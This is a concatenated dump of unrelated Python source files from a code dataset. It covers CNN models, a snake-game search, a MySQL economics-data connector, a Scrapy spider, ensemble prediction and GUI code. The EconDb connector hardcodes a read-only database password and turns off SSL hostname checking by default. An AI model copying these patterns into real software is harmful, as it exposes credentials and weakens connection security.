ratio of\n # local processing (by 1 × 1 convolutions) is increased compared\n # to the spatial aggregation.\"\"\"\n x = self.Mixed_7b(x)\n x1 = self.PAM_10(x)\n x2 = self.CAM_10(x)\n x = x1 + x2\n\n x = self.Mixed_7c(x)\n x1 = self.PAM_11(x)\n x2 = self.CAM_11(x)\n x = x1 + x2\n\n\n x = F.avg_pool2d(x,kernel_size=7)\n\n x = x.view(x.size(0), -1)\n return x\n\n\nclass InceptionA(nn.Module):\n\n def __init__(self, input_channels, pool_features):\n super().__init__()\n self.branch1x1 = BasicConv2d(input_channels, 64, kernel_size=1)\n\n self.branch5x5_1 = BasicConv2d(input_channels, 48, kernel_size=1)\n self.branch5x5_2 = BasicConv2d(48, 64, kernel_size=5, padding=2)\n\n self.branch3x3dbl_1 = BasicConv2d(input_channels, 64, kernel_size=1)\n self.branch3x3dbl_2 = BasicConv2d(64, 96, kernel_size=3, padding=1)\n self.branch3x3dbl_3 = BasicConv2d(96, 96, kernel_size=3, padding=1)\n\n self.branchpool = BasicConv2d(input_channels, pool_features, kernel_size=1)\n\n def forward(self, x):\n\n #x -> 1x1(same)\n branch1x1 = self.branch1x1(x)\n\n #x -> 1x1 -> 5x5(same)\n branch5x5 = self.branch5x5_1(x)\n branch5x5 = self.branch5x5_2(branch5x5)\n #branch5x5 = self.branch5x5_2(branch5x5)\n\n #x -> 1x1 -> 3x3 -> 3x3(same)\n branch3x3dbl = self.branch3x3dbl_1(x)\n branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)\n branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)\n\n branch_pool = F.avg_pool2d(x,kernel_size=3,stride=1,padding=1)\n branch_pool = self.branchpool(branch_pool)\n\n #x -> pool -> 1x1(same)\n outputs = [branch1x1,branch5x5,branch3x3dbl,branch_pool]\n return torch.cat(outputs, 1)\n\n\nclass InceptionB(nn.Module):\n\n def __init__(self, input_channels):\n super().__init__()\n\n self.branch3x3 = BasicConv2d(input_channels, 384, kernel_size=3, stride=2)\n\n self.branch3x3dbl_1 = BasicConv2d(input_channels, 64, kernel_size=1)\n self.branch3x3dbl_2 = BasicConv2d(64, 96, kernel_size=3, padding=1)\n self.branch3x3dbl_3 = BasicConv2d(96, 96, kernel_size=3, stride=2)\n\n def forward(self, x):\n\n #x - > 3x3(downsample)\n branch3x3 = self.branch3x3(x)\n\n #x -> 3x3 -> 3x3(downsample)\n branch3x3dbl = self.branch3x3dbl_1(x)\n branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)\n branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)\n\n #x -> maxpool(downsample)\n branchpool = F.max_pool2d(x,kernel_size=3,stride=2)\n\n #\"\"\"We can use two parallel stride 2 blocks: P and C. P is a pooling\n #layer (either average or maximum pooling) the activation, both of\n #them are stride 2 the filter banks of which are concatenated as in\n #figure 10.\"\"\"\n outputs = [branch3x3, branch3x3dbl, branchpool]\n\n return torch.cat(outputs, 1)\n\n\nclass InceptionC(nn.Module):\n def __init__(self, input_channels, channels_7x7):\n super(InceptionC,self).__init__()\n self.branch1x1 = BasicConv2d(input_channels, 192, kernel_size=1)\n\n c7 = channels_7x7\n #In theory, we could go even further and argue that one can replace any n × n\n #convolution by a 1 × n convolution followed by a n × 1 convolution and the\n #computational cost saving increases dramatically as n grows (see figure 6).\n self.branch7x7_1 = BasicConv2d(input_channels, c7, kernel_size=1)\n self.branch7x7_2 = BasicConv2d(c7, c7, kernel_size=(1, 7), padding=(0,3))\n self.branch7x7_3 = BasicConv2d(c7, 192, kernel_size=(7,1), padding=(3,0))\n\n self.branch7x7dbl_1 = BasicConv2d(input_channels, c7, kernel_size=1)\n self.branch7x7dbl_2 =BasicConv2d(c7, c7, kernel_size=(7, 1), padding=(3, 0))\n self.branch7x7dbl_3 =BasicConv2d(c7, c7, kernel_size=(1, 7), padding=(0, 3))\n self.branch7x7dbl_4 =BasicConv2d(c7, c7, kernel_size=(7, 1), padding=(3, 0))\n self.branch7x7dbl_5 =BasicConv2d(c7, 192, kernel_size=(1, 7), padding=(0, 3))\n\n\n self.branch_pool = BasicConv2d(input_channels, 192, kernel_size=1)\n\n def forward(self, x):\n\n #x -> 1x1(same)\n branch1x1 = self.branch1x1(x)\n\n #x -> 1layer 1*7 and 7*1 (same)\n branch7x7 = self.branch7x7_1(x)\n branch7x7 = self.branch7x7_2(branch7x7)\n branch7x7 = self.branch7x7_3(branch7x7)\n\n #x-> 2layer 1*7 and 7*1(same)\n branch7x7dbl = self.branch7x7dbl_1(x)\n branch7x7dbl = self.branch7x7dbl_2(branch7x7dbl)\n branch7x7dbl = self.branch7x7dbl_3(branch7x7dbl)\n branch7x7dbl = self.branch7x7dbl_4(branch7x7dbl)\n branch7x7dbl = self.branch7x7dbl_5(branch7x7dbl)\n\n #x-> avgpool (same)\n branchpool = F.avg_pool2d(x,kernel_size=3,stride=1,padding=1)\n branchpool = self.branch_pool(branchpool)\n\n outputs = [branch1x1, branch7x7, branch7x7dbl, branchpool]\n\n return torch.cat(outputs, 1)\n\n\nclass InceptionD(nn.Module):\n\n def __init__(self, input_channels):\n super().__init__()\n\n self.branch3x3_1 = BasicConv2d(input_channels, 192, kernel_size=1)\n self.branch3x3_2 = BasicConv2d(192, 320, kernel_size=3, stride=2)\n\n self.branch7x7_1 = BasicConv2d(input_channels, 192, kernel_size=1)\n self.branch7x7_2 = BasicConv2d(192, 192, kernel_size=(1, 7), padding=(0, 3))\n self.branch7x7_3 = BasicConv2d(192, 192, kernel_size=(7, 1), padding=(3, 0))\n self.branch7x7_4 = BasicConv2d(192, 192, kernel_size=3, stride=2)\n\n def forward(self, x):\n\n #x -> 1x1 -> 3x3(downsample)\n branch3x3 = self.branch3x3_1(x)\n branch3x3 = self.branch3x3_2(branch3x3)\n\n #x -> 1x1 -> 1x7 -> 7x1 -> 3x3 (downsample)\n branch7x7 = self.branch7x7_1(x)\n branch7x7 = self.branch7x7_2(branch7x7)\n branch7x7 = self.branch7x7_3(branch7x7)\n branch7x7 = self.branch7x7_4(branch7x7)\n\n #x -> avgpool (downsample)\n branchpool = F.max_pool2d(x,kernel_size=3,stride=2)\n\n outputs = [branch3x3, branch7x7, branchpool]\n\n return torch.cat(outputs, 1)\n\n\nclass InceptionE(nn.Module):\n def __init__(self, input_channels):\n super().__init__()\n self.branch1x1 = BasicConv2d(input_channels, 320, kernel_size=1)\n\n self.branch3x3_1 = BasicConv2d(input_channels, 384, kernel_size=1)\n self.branch3x3_2a = BasicConv2d(384, 384, kernel_size=(1, 3), padding=(0, 1))\n self.branch3x3_2b = BasicConv2d(384, 384, kernel_size=(3, 1), padding=(1, 0))\n\n self.branch3x3stack_1 = BasicConv2d(input_channels, 448, kernel_size=1)\n self.branch3x3stack_2 = BasicConv2d(448, 384, kernel_size=3, padding=1)\n self.branch3x3stack_3a = BasicConv2d(384, 384, kernel_size=(1, 3), padding=(0, 1))\n self.branch3x3stack_3b = BasicConv2d(384, 384, kernel_size=(3, 1), padding=(1, 0))\n\n self.branch_pool = BasicConv2d(input_channels, 192, kernel_size=1)\n\n def forward(self, x):\n\n #x -> 1x1 (same)\n branch1x1 = self.branch1x1(x)\n\n # x -> 1x1 -> 3x1\n # x -> 1x1 -> 1x3\n # concatenate(3x1, 1x3)\n #\"\"\"7. Inception modules with expanded the filter bank outputs.\n #This architecture is used on the coarsest (8 × 8) grids to promote\n #high dimensional representations, as suggested by principle\n #2 of Section 2.\"\"\"\n branch3x3 = self.branch3x3_1(x)\n branch3x3 = [\n self.branch3x3_2a(branch3x3),\n self.branch3x3_2b(branch3x3)\n ]\n branch3x3 = torch.cat(branch3x3, 1)\n\n # x -> 1x1 -> 3x3 -> 1x3\n # x -> 1x1 -> 3x3 -> 3x1\n #concatenate(1x3, 3x1)\n branch3x3stack = self.branch3x3stack_1(x)\n branch3x3stack = self.branch3x3stack_2(branch3x3stack)\n branch3x3stack = [\n self.branch3x3stack_3a(branch3x3stack),\n self.branch3x3stack_3b(branch3x3stack)\n ]\n branch3x3stack = torch.cat(branch3x3stack, 1)\n\n branchpool = F.avg_pool2d(x,kernel_size=3,stride=1,padding=1)\n branchpool = self.branch_pool(branchpool)\n\n outputs = [branch1x1, branch3x3, branch3x3stack, branchpool]\n\n return torch.cat(outputs, 1)\n\nclass InceptionAux(nn.Module):\n def __init__(self,in_channels,num_classes):\n super(InceptionAux,self).__init__()\n self.conv0 = BasicConv2d(in_channels,128,kernel_size=1)\n self.conv1 = BasicConv2d(128,768,kernel_size=5)\n self.conv1.stddev = 0.01\n self.fc = nn.Linear(768,num_classes)\n self.fc.stddev = 0.001\n\n def forward(self,x):\n #17x17x768\n x = F.avg_pool2d(x,kernel_size=5,stride=3)\n #5x5x768\n x = self.conv0(x)\n #5x5x128\n x = self.conv1(x)\n #1x1x768\n x = x.view(x.size(0),-1)\n #768\n x = self.fc(x)\n return x\n\nclass BasicConv2d(nn.Module):\n def __init__(self,in_channels,out_channels,**kwargs):\n super(BasicConv2d,self).__init__()\n self.conv = nn.Conv2d(in_channels,out_channels,bias=False,**kwargs)\n self.bn = nn.BatchNorm2d(out_channels,eps=0.001)\n\n def forward(self,x):\n x = self.conv(x)\n x = self.bn(x)\n return F.relu(x,inplace=True)\n","sub_path":"assess_boneage/models/InceptionV3_PAM_CAM.py","file_name":"InceptionV3_PAM_CAM.py","file_ext":"py","file_size_in_byte":15328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"258723333","text":"from data.virtualsnake import VirtualSnake\nfrom utils.priorityqueue import PriorityQueue\nfrom collections import deque\n\nclass LongevityChecker:\n \"\"\"Checks whether a snake has plenty of moves left or is actually doomed.\"\"\"\n\n MAX_SNAKES = 50\n MAX_STEPS = 30 # Warning: this may be changed at runtime if the game nears the end.\n # (Not yet implemented though.)\n\n @staticmethod\n def freedom_degree(snake, other_snake=None):\n \"\"\"Returns she maximum amount of moves shat can be made, or MAX_STEPS, along\n with the length of the longest snake that can be made at specific time steps.\"\"\"\n\n snakes = [snake.clone_virtual()]\n movements = 0\n max_length = 0\n max_length_arr = [snake.length]\n\n # This function shall keep making virtual snakes in all directions the old\n # snakes could move. If too many snakes are born, prefer the longer ones.\n\n for i in range(LongevityChecker.MAX_STEPS):\n new_snakes = deque()\n for j in range(LongevityChecker.MAX_SNAKES):\n if not snakes: # Snakes is empty\n break\n snake = snakes.pop()\n available_directions = snake.get_available_directions(other_snake=other_snake)\n for i in range(len(available_directions)):\n # We want to put a clone of this snake in the new collection.\n # However, if this is the last direction for this snake, we\n # may as well use the snake himself, since he won't be needed\n # later. This significantly improves performance by not\n # copying things.\n # Compare it to the C++ move operator.\n if i == len(available_directions) - 1:\n new_snake = snake\n else:\n new_snake = snake.clone_virtual()\n \n new_snake.move(available_directions[i])\n new_snakes.append(new_snake)\n\n if max_length < new_snake.length:\n max_length = new_snake.length\n if not new_snakes:\n break\n else:\n max_length_arr.append(max_length)\n movements += 1\n snakes = sorted(new_snakes, key=lambda snake: snake.length)\n \n return (movements, max_length_arr)\n","sub_path":"control/modules/longevitychecker.py","file_name":"longevitychecker.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"34621022","text":"\n\nfrom xai.brain.wordbase.nouns._crackle import _CRACKLE\n\n#calss header\nclass _CRACKLED(_CRACKLE, ):\n\tdef __init__(self,): \n\t\t_CRACKLE.__init__(self)\n\t\tself.name = \"CRACKLED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"crackle\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_crackled.py","file_name":"_crackled.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"72075896","text":"'''\nCreated on 2019年3月23日\n\n@author: user\n'''\nimport datetime as dt\n\nfrom pandas import DataFrame\n\nfrom panormus.data.bo.db_engine import (MySqlEngine)\n\n\ndef get_instance_using_credentials():\n \"\"\"\n :description: creates an connector public read-only credentials\n :return: client instance\n \"\"\"\n\n return EconDb(user='ECON_RO', password='RpZi7Mie5oRSEjyp')\n\n\nclass EconDb(MySqlEngine):\n \"\"\"\n Create a connector to economics database\n\n \"\"\"\n\n def __init__(\n self, user, password,\n db_name='ECON',\n host='econ-ro.mysql.pm.a.dev.use1.aws.caxton.com',\n port=3306,\n connector='mysql+pymysql',\n pool_recycle=1800,\n verifyServerCertificate=False,\n ):\n \"\"\"\n :param str user: database user\n :param str password: password\n :param str db_name: database name within host\n :param str host: host address\n :param int port: port number\n :param str connector: connection driver for sql alchemy\n :param int pool_recycle: connection pool recycle period\n \"\"\"\n super().__init__(\n user=user, password=password,\n db_name=db_name, host=host, port=port,\n connector=connector, pool_recycle=pool_recycle,\n connect_args={'ssl': {'check_hostname': verifyServerCertificate}}\n )\n\n def get(self,\n tickers,\n start_date=dt.datetime(1500, 1, 1), end_date=dt.datetime(2099, 12, 31),\n vintage='last', output='data', query_raw_db=False\n ):\n \"\"\"\n Get time series for tickers in the Economic Database\n\n :param str|list[str] tickers: EDB tags \\\n (see: https://tableau.a.dev.use1.aws.caxton.com/#/views/Haver_Extract/Haver?:iid=1)\n :param dt.datetime|None start_date: Optional start date\n :param dt.datetime|None end_date: Optional end date\n :param str vintage: 'last' for the last revision and 'first' for the first known unrevised value\n :param str output: 'data' for the data or 'timestamp' for the timestamps of the data\n :param bool query_raw_db: False to query helper tables, True to query the raw DB directly\n :rtype: DataFrame\n \"\"\"\n # parse data\n if start_date is None:\n start_date = dt.datetime(1500, 1, 1)\n if end_date is None:\n end_date = dt.datetime(2099, 12, 31)\n\n if isinstance(tickers, str):\n tickers = [tickers]\n\n if vintage.lower() in ('last', 'revised'):\n if query_raw_db:\n select = \"Attribute, TimeStamp, Value, MAX(KnownAsOf)\"\n db = \"EDB\"\n groupby = \" GROUP BY Attribute, TimeStamp\"\n else:\n select = \"*\"\n db = \"LastEDB\"\n groupby = \"\"\n elif vintage.lower() in ('first', 'unrevised'):\n if query_raw_db:\n select = \"Attribute, TimeStamp, Value, MIN(KnownAsOf)\"\n db = \"EDB\"\n groupby = \" GROUP BY Attribute, TimeStamp\"\n else:\n select = \"*\"\n db = \"FirstEDB\"\n groupby = \"\"\n else:\n raise ValueError(f\"Vintage option '{vintage}' not valid\")\n\n if output.lower() == 'data':\n col = 'Value'\n elif output.lower() == 'timestamp':\n col = 'KnownAsOf'\n\n sd_str = \"\\'\" + start_date.strftime(\"%Y-%m-%d\") + \"\\'\"\n ed_str = \"\\'\" + end_date.strftime(\"%Y-%m-%d\") + \"\\'\"\n tags_str = \",\".join([\"\\'\" + tag + \"\\'\" for tag in tickers])\n # tags_str = 'USA_PMI_SERVICES_SA'\n sql_string = (\n f\"SELECT {select} FROM ECON.{db} WHERE Attribute IN ({tags_str}) \"\n f\"AND TimeStamp >= {sd_str} AND TimeStamp <= {ed_str}{groupby}\"\n )\n # 'USA_SBO_NFIB_INDEX_SA' in df_raw['Attribute']\n # run sql query\n df_raw = self.run_query(sql_string)\n df_out = df_raw.pivot(index='TimeStamp', columns='Attribute', values=col)\n # df_out.plot()\n return df_out\n ","sub_path":"Caxton/panormus_OLD/data/bo/econ.py","file_name":"econ.py","file_ext":"py","file_size_in_byte":4095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"73175622","text":"# coding=utf-8\r\nfrom scrapy.spider import BaseSpider\r\nfrom weisou.items import WeisouItem\r\nfrom scrapy.selector import HtmlXPathSelector\r\nfrom grab.models import Weixingongzhong\r\n\r\nclass GongZhongHaoSpider(BaseSpider):\r\n\t'''\r\n\tscrapy crawl gongzhognhao\r\n\t抓取选定的微信公众号内容\r\n\t微信搜索已经启用反爬虫程序,目前爬不了内容\r\n\t'''\r\n\tname = \"gongzhonghao\"\r\n\tallowed_domains = [\"http://weixin.sogou.com/\"]\r\n\tstart_urls = []\r\n\r\n\tweixinlist = Weixingongzhong.objects.filter(state='1')\r\n\tfor weixin in weixinlist:\r\n\t\tstart_urls.append(weixin.weixinurl)\r\n\r\n\tdef parse(self, response):\r\n\t\thxs = HtmlXPathSelector(response)\r\n\t\tsites = hxs.select('//div[@class=\"wx-rb wx-rb3\"]')\r\n\t\tfor site in sites:\r\n\t\t\titem = WeisouItem()\r\n\t\t\titem['title'] = site.select('div[@class=\"txt-box\"]/h4/a/text()').extract()[0]\r\n\t\t\titem['desc'] = site.select('div[@class=\"txt-box\"]/p/text()').extract()[0]\r\n\t\t\titem['pic'] = site.select('div[@class=\"img_box2\"]/a/img/@src').extract()[0]\r\n\t\t\titem['url'] = site.select('div[@class=\"img_box2\"]/a/@href').extract()[0]\r\n\t\t\t#print item['title'] + '\\n' + item['desc'] + '\\n' + item['pic'] + '\\n' + item['url']\r\n\t\t\tyield item","sub_path":"weisou/weisou/spiders/GongZhongHaoSpider.py","file_name":"GongZhongHaoSpider.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"247907247","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPackage for the major class of making ensemble predictions using multiple trained models\n\nAuthor: Lianfa Li\nDate: 2019-08-01\n\n\"\"\"\n\n\nimport os\nimport multiprocessing\nfrom multiprocessing import Process, Manager\nimport pickle\nimport math\n\nimport pandas as pd\nimport numpy as np\nfrom keras.models import model_from_json\nfrom baggingrnet.util.pmetrics import r2K,r2KAuto,r2np,rmse2np\n\nclass ensPrediction:\n \"\"\"\n Major class of making ensebmle predictions using trained bagging models\n\n # Examples\n\n ```python\n # import the major prediction class\n from baggingrnet.model.baggingpre import ensPrediction\n inPath='covs_test.csv' # The path to the test CSV dataset ;\n gindex='gindex' # Unique identifier to merging the predictions from multiple models;\n feasList = ['lat', 'lon', 'ele', 'prs'] # List of the name of the predictors to be used in the models;\n target='pm25_avg_log' # Name of the target variable (dependent test)\n bagpath='/testpath/baggingrnet' # The bagging path used to store training results in bagging;\n prepath=\"/testpath/bagprediction1\" # The path to save the results of prediction ;\n mbagpre=ensPrediction(bagpath,prepath) # The instance of the class ensPrediction with the arguments, bagpath,prepath;\n mbagpre.getInputSample(inPath, feasList,gindex) # Load the test datatset\n mbagpre.startMProcess(10) # Start the prediction process using 10 core for parallel predicting;\n mbagpre.aggPredict(isval=True,tfld='pm25_davg') # Get the ensemble predictions from the predictions of multiple models.\n ```\n # Arguments\n :param baggingpath: the root path for multple models,,same as in the bagging class;\n :param targetpath: the target path to save the predictions of multiple models and the ensembled predictions;\n :param maxlimit: Threshold for the extreme values of the predictions, default: 750.\n \"\"\"\n def __init__(self,baggingpath,targetpath,maxlimit=750):\n tfl = baggingpath + \"/tasks.pkl\"\n with open(tfl, 'rb') as handle:\n self.tasks = pickle.load(handle)\n self.maxlimit=maxlimit\n self.targetpath=targetpath\n normPath = baggingpath + \"/wholesc.pkl\"\n with open(normPath, 'rb') as handle:\n self.scX = pickle.load(handle)\n self.scy = pickle.load(handle)\n\n def getInputSample(self,input, feasList,gindex):\n \"\"\"\n Function to read the test CSV file\n :param input: Path of the CSV data file (with header available) or the dataframe object;\n :param feasList: List of the names of predictors to be used in the models ;\n :param gindex: Name of unique identifier for each record (item), used later for aggregating;\n \"\"\"\n if type(input)==str and input!='':\n sampledt = pd.read_csv(input)\n elif type(input)==pd.DataFrame:\n sampledt=input\n else:\n print(\"Please enter the data file path or original Data Frame of the input! \")\n return\n self.gindexFld=gindex\n self.tcols =feasList\n self.sampledt=sampledt\n X = sampledt[self.tcols]\n self.Xn = self.scX.transform(X)\n\n def DModelPredict(self,imodel,modelpath,feaIndex,islog=True):\n \"\"\"\n Function to making the predictions for a model.\n :param imodel: Model unique identifier ;\n :param modelpath: The path of the trained model ;\n :param feaIndex: Index of the predictors (features) used in the models;\n :return: the output layer saved in the corresponding path.\n \"\"\"\n structureFl = modelpath +'/mframe.json'\n json_file = open(structureFl, 'r')\n loaded_model_json = json_file.read()\n json_file.close()\n loaded_model = model_from_json(loaded_model_json)\n # load weights into new model\n weiFl = modelpath +'/weights.hd5'\n loaded_model.load_weights(weiFl)\n loaded_model.compile(optimizer=\"adam\", loss='mean_squared_error',\n metrics=['mean_squared_error', r2K, r2KAuto])\n Xns=self.Xn[:,feaIndex]\n pre0 = loaded_model.predict(Xns)\n pre = self.scy.inverse_transform(pre0)\n if islog:\n pre = np.exp(pre)\n pre=pre.reshape((pre.shape[0],))\n pre[pre > self.maxlimit] = self.maxlimit\n self.sampledt['pre'] = pre\n tfl = self.targetpath + '/m' + str(imodel) + '_tpre.csv'\n self.sampledt[[self.gindexFld,'pre']].to_csv(tfl, index=False)\n\n def subPredict(self, istart, iend):\n \"\"\"\n Function to initiate a process to make predictions for one or multiple trained models.\n :param istart: Staring model identifier;\n :param iend: Ending model identifier;\n \"\"\"\n p = multiprocessing.current_process()\n print(\"Starting process \" + p.name + \", pid=\" + str(p.pid) + \" ... ...\")\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = ''\n klist = list(self.tasks.keys())\n klist.sort()\n for i in range(istart, iend):\n mkey=klist[i]\n aTask = self.tasks[mkey]\n imodel = aTask['name']\n feaIndex = aTask['feaIndex']\n modelpath = aTask['taskPath']\n islog = aTask['islog']\n self.DModelPredict(imodel,modelpath,feaIndex,islog)\n print(\"Done with \" + p.name + \", pid=\" + str(p.pid) + \"!\")\n\n def startMProcess(self, ncore):\n \"\"\"\n Function to initiate multiple process to make the predictions for multiple models.\n :param ncore: Number of cores to be used in parallel predictions;\n \"\"\"\n n = len(self.tasks)\n nTime = int(math.ceil(n / ncore))\n print(str(ncore) + \" cores for \" + str(n) + \" duties; each core has about \" + str(nTime) + \" duties\")\n for t in range(0, nTime):\n istart = t * ncore\n iend = (t + 1) * ncore\n if t == (nTime - 1):\n iend = n\n processes = []\n for k in range(istart, iend):\n p = Process(name=str(t), target=self.subPredict, args=(k, k + 1,))\n p.daemon = True\n p.start()\n processes.append(p)\n for p in processes:\n p.join()\n\n def aggPredict(self,isval=False,tfld=None):\n \"\"\"\n Function to obtain the ensemble predicitons from the outputs of multiple models and evaluation (optional).\n :param isval: False, no evaluation for the ensemble predictions; True, evaluation for the ensemble predictions. Default: False;\n :param tfld: Name of the target variable of ground truth onlu work when isval is True.\n :return:The ensemble predictions to be saved on the aggpreds_eval.csv file of the prediction path;\n print the evaluation's results if isval is True.\n \"\"\"\n klist = list(self.tasks.keys())\n klist.sort()\n allpreds=[]\n for i in range(len(klist)):\n mkey = klist[i]\n aTask = self.tasks[mkey]\n imodel = aTask['name']\n tfl = self.targetpath + '/m' + str(imodel) + '_tpre.csv'\n apredictions= pd.read_csv(tfl)\n allpreds.append(apredictions)\n allpreds=pd.concat(allpreds)\n grouped = allpreds['pre'].groupby(allpreds['gindex'])\n gmeann=grouped.mean().to_frame('mean')\n gstd=grouped.std().to_frame('std')\n mergedPre=pd.merge(gmeann, gstd, left_index=True, right_index=True)\n mergedPre.to_csv(self.targetpath+'/aggpreds.csv')\n if not isval:\n return\n evalPre = pd.merge(mergedPre, self.sampledt[['gindex',tfld]],\n left_index=True, right_on='gindex')\n r2 = r2np(evalPre['mean'], evalPre[tfld])\n rmse = rmse2np(evalPre['mean'], evalPre[tfld])\n evalPre.to_csv(self.targetpath + '/aggpreds_eval.csv')\n print(\"Independent test r2=\",r2,\"; rmse=\",rmse)","sub_path":"build/lib.linux-x86_64-3.4/baggingrnet/model/baggingpre.py","file_name":"baggingpre.py","file_ext":"py","file_size_in_byte":8179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"80569121","text":"# O(N) time complexity, O(N) space complexity\nclass Solution:\n def isReflected(self, points):\n \"\"\"\n :type points: List[List[int]]\n :rtype: bool\n \"\"\"\n if points == None or len(points) < 2: return True \n min_x = float('inf')\n max_x = -float('inf')\n s = set()\n for x, y in points:\n min_x = min(min_x, x)\n max_x = max(max_x, x)\n s.add(str(x) + ' ' + str(y)) \n sum_ = max_x + min_x\n for point in s:\n x, y = point.split(\" \")\n new_x = sum_ - int(x)\n if str(new_x)+\" \"+str(y) not in s: return False\n return True\n","sub_path":"Math/LineReflection_356.py","file_name":"LineReflection_356.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"276835938","text":"import numpy as np\nimport cv2\n\ndef validate_array_input(noisy_images: np.ndarray):\n assert type(noisy_images) == np.ndarray, \\\n 'noisy_images should be a numpy array.'\n \n assert len(noisy_images.shape) == 4, \\\n 'noisy_images should have 4 dimensions. \\\n Read the function documentation for more details.'\n\n assert noisy_images.shape[3] == 1 or noisy_images.shape[3] == 3, \\\n 'The color dimensions should be 1 for grayscale \\\n or 3 for RGB colored images.'\n\ndef validate_if_noise_std_dev_is_a_float(noise_std_dev: float):\n assert type(noise_std_dev) == float, 'noise_std_dev should be float.'\n\ndef normalize(numpy_array: np.ndarray, interval=(0, 255), data_type: str = 'float') -> np.ndarray:\n assert data_type in ('float', 'int'), 'data_type should be \"float\" or \"int\".'\n \n out = cv2.normalize(numpy_array, None, alpha = interval[0], beta = interval[1], norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)\n\n if data_type == 'float':\n return out\n else:\n return out.astype('uint16')\n","sub_path":"denoising/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"71361028","text":"import os\nimport time\nimport tensorflow as tf\nimport numpy as np\nimport uabCrossValMaker\nimport uab_collectionFunctions\nimport sis_utils\nfrom bohaoCustom import uabMakeNetwork_UNet\n\n# settings\ngpu = 1\nbatch_size = 1\n#input_sizes = [828, 1084, 1340, 1596, 572, 1852, 2108, 2364, 2620]\n#input_sizes = [540, 572, 620, 684, 796]\n#batch_sizes = [6, 5, 4, 3, 2]\ninput_sizes = [412, 460, 476, 492, 508]\nbatch_sizes = [15, 10, 9, 8, 7]\ntile_size = [5000, 5000]\nimg_dir, task_dir = sis_utils.get_task_img_folder()\n\nfor cnt, size in enumerate(input_sizes):\n start_time = time.time()\n\n tf.reset_default_graph()\n input_size = [size, size]\n\n model_dir = r'/hdd/Models/exp2/UnetCrop_inria_aug_grid_1_PS({}, {})_BS{}_EP100_LR0.0001_DS60_DR0.1_SFN32'.\\\n format(size, size, batch_sizes[cnt])\n blCol = uab_collectionFunctions.uabCollection('inria')\n blCol.readMetadata()\n file_list, parent_dir = blCol.getAllTileByDirAndExt([0, 1, 2])\n file_list_truth, parent_dir_truth = blCol.getAllTileByDirAndExt(4)\n idx, file_list = uabCrossValMaker.uabUtilGetFolds(None, file_list, 'force_tile')\n idx_truth, file_list_truth = uabCrossValMaker.uabUtilGetFolds(None, file_list_truth, 'force_tile')\n # use first 5 tiles for validation\n file_list_valid = uabCrossValMaker.make_file_list_by_key(\n idx, file_list, [i for i in range(0, 6)],\n filter_list=['bellingham', 'bloomington', 'sfo', 'tyrol-e', 'innsbruck'])\n file_list_valid_truth = uabCrossValMaker.make_file_list_by_key(\n idx_truth, file_list_truth, [i for i in range(0, 6)],\n filter_list=['bellingham', 'bloomington', 'sfo', 'tyrol-e', 'innsbruck'])\n img_mean = blCol.getChannelMeans([0, 1, 2])\n\n # make the model\n # define place holder\n X = tf.placeholder(tf.float32, shape=[None, 1052, 1052, 3], name='X')\n y = tf.placeholder(tf.int32, shape=[None, 1052, 1052, 1], name='y')\n mode = tf.placeholder(tf.bool, name='mode')\n model = uabMakeNetwork_UNet.UnetModelCrop({'X':X, 'Y':y},\n trainable=mode,\n input_size=[1052, 1052],\n batch_size=1)\n # create graph\n model.create_graph('X', class_num=2)\n\n # evaluate on tiles\n iou_return = model.evaluate(file_list_valid, file_list_valid_truth, parent_dir, parent_dir_truth,\n [1052, 1052], tile_size, batch_size, img_mean, model_dir, gpu, save_result=False)\n duration = time.time() - start_time\n\n iou_return['time'] = duration\n np.save(os.path.join(task_dir, '{}_samesize.npy'.format(size)), iou_return)\n","sub_path":"]tasks/2017.12.16.framework_train_cnn/test_inria_different_scale.py","file_name":"test_inria_different_scale.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"276945487","text":"import wx\nimport wx.aui\nfrom . import corbomiteGuiWidgetFactory\nimport wx.lib.newevent\n\n\nclass DevicePanel(wx.Panel):\n def __init__(self, parent):\n print(\"Device panel constructor start\")\n wx.Panel.__init__(self, parent=parent, id=wx.ID_ANY)\n self.sizer = wx.BoxSizer(wx.VERTICAL)\n self.SetSizer(self.sizer)\n self.widgets = {}\n self.parent = parent\n self.myInitEvent, self.EVT_MY_INIT_EVENT = wx.lib.newevent.NewEvent()\n self.Bind(self.EVT_MY_INIT_EVENT, self.receiveInitEvent)\n self.parent.Layout()\n print(\"Device panel constructor finished\")\n\n def receiveInitEvent(self, widget):\n new = corbomiteGuiWidgetFactory.createWidget(self, widget)\n if new is not None:\n self.sizer.Add(new, new.yWeight, wx.EXPAND)\n self.sizer.Layout()\n\n def initCallback(self, widget):\n wx.CallAfter(self.receiveInitEvent, widget)\n\n def receiveCallback(self, data):\n # if data == \"idle\":\n # print \"Idle\"\n # if data == \"busy\":\n # print \"Busy\"\n 